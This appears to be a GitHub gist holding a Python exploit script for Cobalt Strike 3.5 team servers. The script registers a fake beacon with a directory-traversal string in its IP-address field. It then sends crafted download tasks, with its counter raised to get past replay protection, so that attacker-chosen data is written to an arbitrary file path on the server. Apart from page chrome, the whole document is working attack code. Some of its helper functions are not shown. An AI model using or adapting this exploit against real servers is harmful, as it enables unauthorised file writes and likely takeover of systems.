Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Retired Cobalt Strike 3.5 exploit example
# First we need to register a beacon with a directory traversal in the ip address field
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0]
# Generate symmetric keys (used later)
raw_aes_keys = os.urandom(16)
aes_key, hmac_key = generate_keys(raw_aes_keys)
m = Metadata(public_key=args.public_key, cs_version=3)
m.public_key = args.public_key
m.bid = args.bid
m.pid = args.pid
m.ver = "10.0"
m.intz = ip_address
m.comp = args.computer
m.user = args.username
m.is64 = '1' # 64-bit OS
m.barch = '1' # 64-bit beacon
m.raw_aes_keys = raw_aes_keys
m.calculate_aes()
enc = m.pack()
# register the beacon
print "[*] Staging beacon .."
register_beacon(enc, args.target, args.uri, args.host, args.ssl)
# Now we need to push a DOWNLOAD_START response to cause a file write
print "[*] Creating file .."
data, fid = build_download_task(os.path.split(args.filepath)[1], aes_key, hmac_key)
# Send it to the server. This is the equivalent of touch(filepath)
# submit.php should be replaced with malleable C2 setting if applicable
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
# Build another task which is going to write the data to the touched file
# We force the counter to be higher than the last task to avoid replay protection
print "[*] Sending data .."
data = build_download_data(args.filedata, fid, aes_key, hmac_key, counter()+100)
# Fire it..
beacon_checkin(args.target, 'submit.php', data, args.bid, args.host, args.ssl)
print "[+] Done!"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment